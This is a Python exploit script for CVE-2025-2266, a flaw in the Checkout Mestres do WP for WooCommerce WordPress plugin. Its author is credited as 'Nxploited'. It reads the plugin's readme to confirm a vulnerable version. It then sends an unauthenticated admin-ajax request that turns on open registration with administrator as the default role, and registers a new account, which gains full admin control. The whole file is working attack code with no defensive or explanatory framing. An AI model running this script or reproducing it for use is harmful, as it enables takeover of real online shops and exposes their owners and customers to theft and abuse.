# -*- coding: utf-8 -*-
import requests
import argparse
import time

# Exploit By : Nxploited | Khaled Alenazi,

requests.packages.urllib3.disable_warnings()

def parse_arguments():
    parser = argparse.ArgumentParser(description="CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit By : Nxploited | Khaled Alenazi,")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL (e.g., http://example.com/wordpress)")
    parser.add_argument("-newuser", nargs='?', const="nxploited", help="Create new admin user (default username: nxploited)")
    parser.add_argument("-email", nargs='?', const="nxploitbot@gmail.com", default="nxploitbot@gmail.com", help="Email for new user (default: nxploitbot@gmail.com)")
    return parser.parse_args()

def prepare_session():
    session = requests.Session()
    session.verify = False
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    })
    return session

def get_urls(base_url):
    ajax_url = f"{base_url}/wp-admin/admin-ajax.php"
    register_url = f"{base_url}/wp-login.php?action=register"
    readme_url = f"{base_url}/wp-content/plugins/checkout-mestres-wp/readme.txt"
    return ajax_url, register_url, readme_url

def check_plugin_vulnerability(session, readme_url):
    try:
        response = session.get(readme_url, timeout=10)
        if "Stable tag: 8.6.5" in response.text or "Stable tag: 8.7.5" in response.text:
            print("[+] Target is vulnerable! Exploiting now...")
            time.sleep(3)
            return True
        else:
            print("[-] Plugin version is not vulnerable.")
            return False
    except Exception as e:
        print(f"[!] Could not read readme.txt: {e}")
        print("[*] Trying to exploit anyway...")
        return True

def enable_registration(session, ajax_url):
    payload = {
        "action": "cwmpUpdateOptions",
        "data": "users_can_register=1&default_role=administrator"
    }
    response = session.post(ajax_url, data=payload)
    print(f"[DEBUG] Response from exploit: {response.text.strip()}")
    return "sucesso" in response.text.lower()

def register_new_user(session, register_url, username, email, base_url):
    payload = {
        "user_login": username,
        "user_email": email
    }
    response = session.post(register_url, data=payload)
    print(f"[DEBUG] Response from registration: {response.text.strip()}")
    if "username" in response.text.lower() or response.status_code == 200:
        print(f"[+] Step 2: User '{username}' registered successfully.")
        print(f"[!] Login at: {base_url}/wp-login.php")
        print(f"[!] Username: {username}")
        print(f"[!] Email: {email}")
        print("[!] Set password manually from admin panel or reset link.\n")
    else:
        print("[!] Registration sent, but check manually if user was created.")

def main():
    args = parse_arguments()
    base_url = args.url.rstrip("/")
    username = args.newuser if args.newuser else None
    email = args.email
    session = prepare_session()
    ajax_url, register_url, readme_url = get_urls(base_url)

    print("====================================")
    print("     CVE-2025-2266 Exploit Tool     ")
    print("     Author: Nxploited | Khaled Alenazi")
    print("====================================\n")

    if check_plugin_vulnerability(session, readme_url):
        if enable_registration(session, ajax_url):
            if username:
                register_new_user(session, register_url, username, email, base_url)
        else:
            print("[-] Exploit failed — target may not be vulnerable.")
    else:
        print("[-] Target does not appear vulnerable.")

    print("\n[✓] Exploit By Nxploited | Khaled Alenazi")

if __name__ == "__main__":
    main()